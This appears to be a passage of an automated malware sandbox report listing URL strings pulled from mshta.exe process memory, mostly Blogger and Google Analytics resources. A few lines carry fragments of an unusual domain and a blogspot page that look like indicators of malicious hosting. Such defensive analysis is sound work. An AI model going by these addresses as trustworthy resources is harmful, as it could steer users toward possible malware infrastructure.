Source: mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.391935095.00000290A7577000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/rpc_relay.html
Source: mshta.exe, 00000006.00000003.396883475.000000000684E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/rpc_relay.htmllet
Source: mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=bl
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=em
Source: mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=fa
Source: mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=pi
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=tw
Source: mshta.exe, 00000006.00000002.431162379.000000000A337000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.js
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsk
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jso_
Source: mshta.exe, 00000006.00000003.383803015.000000000A2FF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jst.png~
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1661466080-lbx.js
Source: mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.613292278.0000021CF7130000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js/v1/jsbin/3101730221-analyt
Source: mshta.exe, 00000021.00000002.580458210.0000021CF489D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js0
Source: mshta.exe, 0000001D.00000002.575052373.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js2
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js5
Source: mshta.exe, 0000001D.00000002.575052373.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js8b
Source: mshta.exe, 0000001B.00000002.596277403.00000215A89B4000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
Source: mshta.exe, 00000006.00000003.277065858.000000000A36B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsDu
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsb
Source: mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsc92231Z
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsd1A
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsjjC:
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsno
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsp%2Fayoolaayoola.html&type=
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jst
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jst.Q
Source: mshta.exe, 0000001D.00000002.540524758.000001B6E5ED0000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jstml%2522&type=blog&bpli=1
Source: mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsvi;
Source: mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js~
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js(
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js)5
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js.css
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js8))
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsOSZZl
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsS
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsae8))
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsd))
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jse
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsflate
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsk
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jss
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsss
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsz
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/592772849-lbx__en_gb.js
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574898077.000001BEEADD5000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css.w
Source: mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css7
Source: mshta.exe, 00000006.00000003.277065858.000000000A36B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssC:
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssII
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssKv
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssKw
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css_
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css_.
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssm_
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssrC:
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssw
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/4076883957-lightbox_bundle.css
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/4076883957-lightbox_bundle.css//johonathahogyaabagebarhomein
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css...l
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css...x
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css0
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssR
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssaY
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssl
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284852801.000000000A33E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.432534150.000000000A38D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.571748112.000001BEEACFA000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js
Source: mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js-n3
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js/
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js0
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js027821174359424672&zx=2c5db057-0ce4-4
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js1
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js2
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js680886694920034828&zx=ad70dca0-0e6f-4
Source: mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js690726786805467605&zx=1fe0aef2-8b4f-4
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.560022885.000001BEE8B29000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsC:
Source: mshta.exe, 00000006.00000003.284901391.000000000A352000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsLMEM
Source: mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsU
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsUv~E#
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsa
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsflate
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jshttps://johonathahogyaabagebarhomeint
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jskupD
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsola.html700
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsotrack.jsc
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsrder-bottom:1px
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsss
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jstyup.blogspot.com/p/backbone16.html%2
Source: mshta.exe, 00000006.00000003.271977332.00000000067CE000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.272117791.000000000A32D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/unvisited-link-
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/v
Source: mshta.exe, 00000006.00000003.383836757.000000000A359000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com6
Source: mshta.exe, 00000006.00000003.383836757.000000000A359000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.coma
Source: mshta.exe, 0000000D.00000003.516075909.00000290ACF21000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comgooglePlusBootstrapcmtInteractionsEnableddynamicViewsScriptSrclanguageDirecti
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comh
Source: mshta.exe, 00000006.00000003.299772001.000000000AE5E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comisAlternateRenderinglightboxModuleUrlrtdisableGCommentsateShare
Source: mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/O
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/Q
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/T
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/_
Source: mshta.exe, 00000006.00000003.308405199.000000000A307000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.383836757.000000000A359000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.578271881.00000215A61D4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574898077.000001BEEADD5000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574669263.000001BEEAD9D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js(-
Source: mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js)
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js/105
Source: mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js0
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js0I
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js6.html%220
Source: mshta.exe, 0000001B.00000002.575444266.00000215A6101000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574669263.000001BEEAD9D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsC:
Source: mshta.exe, 00000006.00000003.385635808.0000000008DE8000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsH
Source: mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsJ
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsOxL
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsW
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsXxC
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsY
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsal
Source: mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsd
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsh
Source: mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jshC:
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jslC
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsme
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jss
Source: mshta.exe, 00000006.00000003.308405199.000000000A307000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsy
Source: mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/d
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.302524114.000000000AECF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.509428117.00000290ACEB0000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342424142.00000215A3D5D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623318608.00000215A961D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.610943907.0000021CF709E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.603530510.000002632F78C000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/debug/bootstrap
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=I
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.508915853.00000290ACEA4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623774532.00000215A9630000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.611323533.0000021CF70B0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=https://www.googletagmanager.com/gtag/js?id=
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/h
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/m
